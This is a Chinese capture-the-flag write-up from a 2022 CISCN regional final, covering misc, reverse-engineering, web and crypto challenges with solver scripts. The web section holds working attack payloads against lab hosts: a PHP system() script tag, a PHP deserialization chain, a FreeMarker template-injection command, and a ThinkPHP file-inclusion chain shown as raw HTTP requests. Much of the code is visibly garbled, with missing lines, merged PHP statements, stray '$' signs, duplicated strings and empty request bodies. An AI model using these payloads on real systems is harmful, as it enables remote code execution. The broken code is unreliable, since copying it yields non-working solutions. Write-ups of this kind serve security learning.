# CISCN2022东北赛区复赛Writeup-MapleLeaves

4 篇文章 1 订阅

## CISCN2022东北赛区WP-MapleLeaves

### 团队成员

Do1phln b477ery sfc9982 0HB

### Misc

#### 听说这是一个二维码

import xlwt

book = xlwt.Workbook()
style = xlwt.easyxf('pattern: pattern solid, fore_colour black;font: height 250')

with open( 'flag.pcap.out', 'r' ) as f:
qrlist=qr.split("\n")
m=0
for i in qrlist:
n=0
for j in i:
table.col(n).width=256*3
if j=='1': # 黑像素
table.write(m,n,'',style=style)
else:
table.write(m,n,'') # 白像素
n+=1
m+=1
book.save('ctfcode.xls')


Win + Shift + C 使用系统自带反转灰度

#### 涂色板

± 0x20 <=> XOR 0x20

b = bytearray(open('flag.dat', 'rb').read())
for i in range(len(b)):
b[i] ^= 0x20
open('pixel.png', 'wb').write(b)



Stegseek + Rockyou.txt 字典库爆破密码

• 459*60=27540
• 先抓住12，再抓45，最后注意左上角就行
• 如果是n种颜色（n大于等于4）就是n(n-1)(n2-2n+2)(n-2)4
• 最少3种颜色，有30种，3种颜色时上式仍旧成立（

### RE

#### easycpp

int __cdecl main(int argc, const char **argv, const char **envp)
{
void **v3; // rcx
size_t v4; // r8
size_t v5; // r10
void **v6; // rax
void **v7; // r8
void **v8; // rax
void **v9; // r8
void **v10; // rax
void **v11; // r8
void **v12; // rdx
int v13; // eax
const char *v14; // rdx

sub_140002410(argc, "Input:", envp);
sub_140002B60(&qword_140037590);
if ( Size != 38 )
goto LABEL_22;
v5 = 0i64;
v3 = &Buf1;
do
{
v6 = &Buf1;
v7 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v6 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v7 = (void **)Buf1;
*((_BYTE *)v7 + v5) ^= *((_BYTE *)v6 + v5 + 1);
v8 = &Buf1;
v9 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v8 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v9 = (void **)Buf1;
*((_BYTE *)v9 + v5 + 1) ^= *((_BYTE *)v8 + v5 + 2);
v10 = &Buf1;
v11 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v10 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v11 = (void **)Buf1;
*((_BYTE *)v11 + v5 + 2) ^= *((_BYTE *)v10 + v5 + 3);
++v5;
v4 = Size;
}
while ( v5 < Size - 3 );
v12 = &Buf2;
if ( (unsigned __int64)qword_140036C48 >= 0x10 )
v12 = (void **)Buf2;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v3 = (void **)Buf1;
if ( Size != qword_140036C40 || (v13 = memcmp(v3, v12, Size), v14 = "Right!", v13) )
LABEL_22:
v14 = "Wrong!";
sub_140002410(v3, v14, v4);
return 0;
}


enc = [
10,  11, 125,  47, 127, 103, 101,  48,  99,  96,
55,  63,  60,  63,  51,  58,  60,  59,  53,  60,
62, 108, 100,  49, 100, 108,  59, 104,  97,  98,
101,  54,  51,  96,  98,  54,  28, 125
]

i = len(enc) - 1
while i >= 3:
enc[i-1] ^= enc[i]
enc[i-2] ^= enc[i - 1]
enc[i-3] ^= enc[i - 2]

i = i - 1

for i in enc:
print(chr(i), end='')


flag正确，本题得解

### Web

#### Identity

burp 抓包，返回的 header 中有 identity: GuessWhatThis1sY0urIdentity

<script language="php">system('xxx')</script>


#### ezser

<?php
class A{
public $functions=[]; } class B{ private$a;
private $b; public$c;
function __construct()
{
$a = new A();$this->a = &$a->functions;$this->b = array(
"_name" => array(
new C(),
"getFlag"
)
);
$this->c=$a;
}
}
class C{
public function getFlag(){
// echo file_get_contents("/etc/flag");
echo 11111;
}
}

$b = new B(); echo "data=".urlencode(serialize($b)).PHP_EOL;
// data=O%3A1%3A%22B%22%3A3%3A%7Bs%3A4%3A%22%00B%00a%22%3Ba%3A0%3A%7B%7Ds%3A4%3A%22%00B%00b%22%3Ba%3A1%3A%7Bs%3A5%3A%22_name%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A1%3A%22C%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7Ds%3A1%3A%22c%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A9%3A%22functions%22%3BR%3A2%3B%7D%7D


#### ezssti

payload: xxx/render?name=%3C%23assign%20value%3D%22freemarker.template.utility.Execute%22%3Fnew()%3E%24%7Bvalue(%22cat%20F1ag_is_h3re%22)%7D

#### eztp

Application\Home\Controller\IndexController.class.php

<?php
namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller
{
...

public function textBox(){
$query = urldecode(I("post.query")); # 获取 post["query"] parse_str($query,$array); # 作为 url参数解析并赋给$array
$this->assign("array",$array); # 模板渲染变量赋值
$this->display(T("Home@default/list")); # 渲染模板 } }  Application\Home\View\default\list.html <form action="/?s=home/index/textBox" method="post"> <!-- 从这里也能看出路由 --> <label>query</label><input type="text" size="10" maxlength="30" name="query"> <input type="submit" name="" value="submit"> </form> <textarea><?php echo W("Query/query",array("param"=>$array));?></textarea> <!-- 调用 W 函数调用 Query/query Widget -->


Application\Home\Widget\QueryWidget.class.php

<?php

namespace Home\Widget;

class QueryWidget
{
public function query($text){ if(isset($text['name'])&&isset($text['id'])){$info = B($text['name'],$text['tag'],$text['id']); # 条件满足则可以调用 B 函数 我们来看看这个函数的定义 return$info;
}else{
var_dump($text); } } }  ThinkPHP\Common\functions.php <? /** * 执行某个行为 * @param string$name 行为名称
* @param string $tag 标签名称（行为类无需传入） * @param Mixed$params 传入的参数
* @return void
*/
function B($name,$tag = '', &$params = null) { if ('' ==$tag) {
$name .= 'Behavior'; } return \Think\Hook::exec($name, $tag,$params); # 那么这个函数又是干什么的？
}


ThinkPHP\Library\Think\Hook.class.php

<?
class Hook{
...

/**
* 执行某个插件
* @param string $name 插件名称 * @param string$tag 方法名（标签名）
* @param Mixed $params 传入的参数 * @return void */ public static function exec($name, $tag, &$params = null)
{
if ('Behavior' == substr($name, -8)) { // 行为扩展必须用run入口方法$tag = 'run';
}
$addon = new$name(); # 实例化一个类 name 作为类名
return $addon->$tag($params); # 调用一个方法并传参，tag 为方法名，params 为参数 } ... }  这里的 name tag params 都是可控的，于是我们就可以实例化任意类并调用任意方法，恰好有这样一个类 ThinkPHP\Library\Think\Storage\Driver\File.class.php <?php class File extends Storage{ ... /** * 加载文件 * @access public * @param string$filename  文件名
* @param array $vars 传入变量 * @return void */ public function load($_filename, $vars = null) { if (!is_null($vars)) {
extract($vars, EXTR_OVERWRITE); } include$_filename; # 任意文件包含
}

...
}


POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 105
Cache-Control: max-age=0
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



ThinkPHP\Library\Org\Net\Http.class.php

<?
namespace Org\Net;

class Http
/**
* 下载文件
* 如果指定了content参数，则下载该参数的内容
* @static
* @access public
* @param string $filename 下载文件名 * @param string$showname 下载显示的文件名
* @param string $content 下载的内容 * @param integer$expire  下载内容浏览器缓存时间
* @return void
*/
public static function download($filename,$showname = '', $content = '',$expire = 180)
{
if (is_file($filename)) {$length = filesize($filename); } elseif (is_file(UPLOAD_PATH .$filename)) {
$filename = UPLOAD_PATH .$filename;
$length = filesize($filename);
} elseif ('' != $content) {$length = strlen($content); } else { E($filename . L('下载文件不存在！')); # 这里把文件名赋成要写入日志的 php 代码
}
if (empty($showname)) {$showname = \$filename;
}

...


POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 143
Cache-Control: max-age=0
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 188
Cache-Control: max-age=0
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



### Crypto

#### gcrd2（100）

##### 题目
import numpy as np
from flag import T
import random

np.set_printoptions(threshold=np.inf)
def get():
while True:
x = []
for i in range(32):
add = [random.randint(0, 10)] * i + [random.randint(0, 10)] * (32 - i)
if np.linalg.matrix_rank(x) == 32:
return x

a = np.array(get())
b = np.array(get())

# dot 矩阵乘法
aT = np.dot(a, T)
bT = np.dot(b, T)

with open('out', 'w') as f:
for i in range(32):
f.write(str(str(aT[i, :])[1:-1].replace('\n', '')) + '\n')   # 写入aT
for i in range(32):
f.write(str(str(bT[i, :])[1:-1].replace('\n', '')) + '\n')  # 写入 bT
f.close()
res = np.dot(bT, np.dot(T, aT))
flag = 0
for i in str(res[:, 0])[1:-1].replace('\n', '').split(' '):
if not i == '':
flag = flag + int(i)
print(flag)

##### 题解
aT = np.dot(a, T)
bT = np.dot(b, T)


aTbT = [8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
8, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
4, 4, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
4, 4, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
10, 10, 10, 10, 10, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
2, 2, 2, 2, 2, 2, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
8, 8, 8, 8, 8, 8, 8, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
3, 3, 3, 3, 3, 3, 3, 3, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
9, 9, 9, 9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 10, 10, 10, 10, 10, 10, 10, 10, 10;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 9;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 8, 8;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 9, 9, 9, 9;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 3, 3;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 10;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
10, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
9, 9, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
0, 0, 0, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
0, 0, 0, 0, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
1, 1, 1, 1, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4;
9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
5, 5, 5, 5, 5, 5, 5, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
7, 7, 7, 7, 7, 7, 7, 7, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 9, 9;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 2, 2, 2, 2, 2, 2;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 6, 6, 6, 6;
5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 1, 1;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 0;];

t = rref(aTbT)


import hashlib
import numpy as np

aTbT = []
num = 1
for i in f.readlines():
tmp = []

for each in i.replace('\n', '').split(' '):
if each != '':
tmp.append(int(each))
aTbT.append(tmp)
print(str(tmp)[1:-1]+';')
num += 1
aT = aTbT[:32]
bT = np.array(aTbT[32:])

T = []
for i in range(32):
tmp = [0 for i in range(32)]
tmp[i] = 1
T.append(tmp)

res = np.dot(bT, np.dot(T, aT))

flag = 0
for i in str(res[:, 0])[1:-1].replace('\n', '').split(' '):
if not i == '':
flag = flag + int(i)

# print(flag)
f = hashlib.md5()
f.update(str(flag).encode())
print('flag{'+str(f.hexdigest())+'}')


#### math1（200）

##### 题目
import gmpy2
from Crypto.Util.number import *
from flag import flag
assert flag.startswith(b"flag{")
assert flag.endswith(b"}")
message=bytes_to_long(flag)
def keygen(nbit, dbit):
if 2*dbit < nbit:
while True:
a1 = getRandomNBitInteger(dbit)
b1 = getRandomNBitInteger(nbit//2-dbit)

n1 = a1*b1+1

if isPrime(n1):
break
while True:
a2 = getRandomNBitInteger(dbit)
b2 = getRandomNBitInteger(nbit//2-dbit)

n2=a2*b2+1

n3=a1*b2+1
if isPrime(n2) and isPrime(n3):
break
while True:
a3=getRandomNBitInteger(dbit)
if gmpy2.gcd(a3,a1*b1*a2*b2)==1:
v1=(n1-1)*(n2-1) # phi1
k=(a3*inverse(a3,v1)-1)//v1  # k * phi1=k * v1 = ed-1
v2=k*b1+1
if isPrime(v2):
return a3,n1*n2,n3*v2
def encrypt(msg, pubkey):
return pow(msg, pubkey[0], pubkey[1])

nbit = 1024
dbit = 256
e, n1, n2=keygen(nbit, dbit)
print('e =', e)
print('n1 =', n1)
print('n2 =', n2)
c1 = encrypt(message, [e, n1])
c2 = encrypt(message, [e, n2])
print('enc1 =', c1)
print('enc2 =', c2)
# e = 86905291018330218127760596324522274547253465551209634052618098249596388694529
# n1 = 112187114035595515717020336420063560192608507634951355884730277020103272516595827630685773552014888608894587055283796519554267693654102295681730016199369580577243573496236556117934113361938190726830349853086562389955289707685145472794173966128519654167325961312446648312096211985486925702789773780669802574893
# n2 = 95727255683184071257205119413595957528984743590073248708202176413951084648626277198841459757379712896901385049813671642628441940941434989886894512089336243796745883128585743868974053010151180059532129088434348142499209024860189145032192068409977856355513219728891104598071910465809354419035148873624856313067
# enc1 = 71281698683006229705169274763783817580572445422844810406739630520060179171191882439102256990860101502686218994669784245358102850927955191225903171777969259480990566718683951421349181856119965365618782630111357309280954558872160237158905739584091706635219142133906953305905313538806862536551652537126291478865
# enc2 = 7333744583943012697651917897083326988621572932105018877567461023651527927346658805965099102481100945100738540533077677296823678241143375320240933128613487693799458418017975152399878829426141218077564669468040331339428477336144493624090728897185260894290517440392720900787100373142671471448913212103518035775

##### 题解

n 1 = a 1 b 1 + 1 , n 2 = a 2 b 2 + 1 , n 3 = a 1 b 2 + 1 , v 2 = k b 1 + 1 n_1 = a_1b_1+1,n_2=a_2b_2+1, n_3 = a_1b_2+1,v_2=kb_1+1 ,且都为素数

ϕ n 1 = ( n 1 − 1 ) ( n 2 − 1 ) = a 1 a 2 b 1 b 2 = v 1 \phi _{n{_1}} = (n_1-1)(n_2-1) = a_1a_2b_1b_2=v_1

ϕ n 2 = ( n 3 − 1 ) ( v 2 − 1 ) = a 1 b 2 k b 1 \phi _{n{_2}} = (n_3-1)(v_2-1) = a_1b_2kb_1

k=(a3*inverse(a3,v1)-1)//v1e=a3知：

k = ( e ∗ i n v ( e , ϕ n 1 ) − 1 ) / / p h i = e d − 1 / / ϕ n 1 = k ∗ ϕ n 1 / / ϕ n 1 = k k = (e*inv(e, \phi_{n_1}) -1) // phi = ed-1 // \phi_{n_1} = k*\phi_{n_1} // \phi_{n_1} = k

N 2 N 1 = ( a 1 b 2 + 1 ) ( k b 1 + 1 ) ( a 1 b 1 + 1 ) ( a 2 b 2 + 1 ) ≈ a 1 b 2 k b 1 a 1 b 1 a 2 b 2 = k a 2 \frac{N2}{N1}=\frac{(a_1b_2+1)(kb_1+1)}{(a_1b_1+1)(a_2b_2+1)}≈\frac{a_1b_2kb_1}{a_1b_1a_2b_2}=\frac{k}{a_2}

ϕ n 1 ≡ ( − 1 ) ∗ k − 1 m o d    e \phi_{n_1} ≡ (-1)*k^{-1} \mod e

ϕ n 1 ≡ a 1 a 2 b 1 b 2 = 0 m o d    a 2 \phi_{n_1} ≡ a_1a_2b_1b_2 = 0 \mod a_2

import gmpy2
import libnum
from tqdm import tqdm

N1 = 112187114035595515717020336420063560192608507634951355884730277020103272516595827630685773552014888608894587055283796519554267693654102295681730016199369580577243573496236556117934113361938190726830349853086562389955289707685145472794173966128519654167325961312446648312096211985486925702789773780669802574893
N2 = 95727255683184071257205119413595957528984743590073248708202176413951084648626277198841459757379712896901385049813671642628441940941434989886894512089336243796745883128585743868974053010151180059532129088434348142499209024860189145032192068409977856355513219728891104598071910465809354419035148873624856313067
e = 86905291018330218127760596324522274547253465551209634052618098249596388694529
enc1 = 71281698683006229705169274763783817580572445422844810406739630520060179171191882439102256990860101502686218994669784245358102850927955191225903171777969259480990566718683951421349181856119965365618782630111357309280954558872160237158905739584091706635219142133906953305905313538806862536551652537126291478865

# c = continued_fraction(int(N2) / int(N1))
# sage里int不太对
c = continued_fraction(Integer(N2) / Integer(N1))
for i in tqdm(range(1, 211)):
a2 = c.denominator(i)
k = c.numerator(i)
if gmpy2.gcd(k, e) != 1:
continue
tmp = gmpy2.invert(k, e)
res = (-1*tmp) % e
phi_ = crt(res, 0, e, a2)
bound = e * a2 // gmpy2.gcd(e, a2)  # lcm

phi1 = phi_ + (N1 // bound) * bound - 100 * bound  # phi1
for j in range(211):
if gmpy2.gcd(e, st) != 1:
phi1 += bound
continue
d1 = gmpy2.invert(e, phi1)
flag = libnum.n2s(int(pow(enc1, d1, N1)))
if b"flag" in flag:
print(flag)
phi1 += bound


#### Rand0m3 (200)

##### 题目
#!/usr/bin/python3
# Rand0m3
import os, sys
import struct

def _print(content, end = None):
if end != None:
print(content, end = end)
else:
print(content)
sys.stdout.flush()

with open("flag", "r") as f:
return res

def print_prompt():
_print("1. encrypt input")
_print("2. decrypt input")
_print("3. encrypt flag")
_print("4. exit")
_print(">> ", end = "")

return input().strip()

def get_random_u8(): #  get_random_u8()？？
return struct.unpack("<B", os.urandom(1))[0]

def encrypt(s, k):
res = ""
if k <= len(s):
_print("[!] key shold be larger then len(pt) for safty!!")
return ""
for i, c in enumerate(s):
enc = (get_random_u8() + k * i) % 0xff
enc = ord(c) ^ enc
res += hex(enc)[2:].rjust(2, "0")
return res

def decrypt(s, k):
_print("[*] Give me the paper about predicting urandoGive me the paper about predicting urandomm")
_print("[*] ...Then i'll decrypt your input ;)")
return ""

if __name__ == "__main__":
while True:
print_prompt()
if c == 1:
_print("key >> ", end = "")
_print("pt >> ", end = "")
_print("result : %s"%encrypt(pt, key))
elif c == 2:
_print("key >> ", end = "")
_print("ct >> ", end = "")
_print("result : %s"%decrypt(ct, key))
elif c == 3:
_print("key >> ", end = "")
_print("result : %s"%encrypt(flag, key))
elif c == 4:
_print("bye!!")
exit(0)
else:
_print("invalid option...")

##### 题解

def encrypt(s, k):
res = ""
if k <= len(s):
_print("[!] key shold be larger then len(pt) for safty!!")
return ""
for i, c in enumerate(s):  # i 为index位置， c为s[i]
enc = (get_random_u8() + k * i) % 0xff  # 0到254
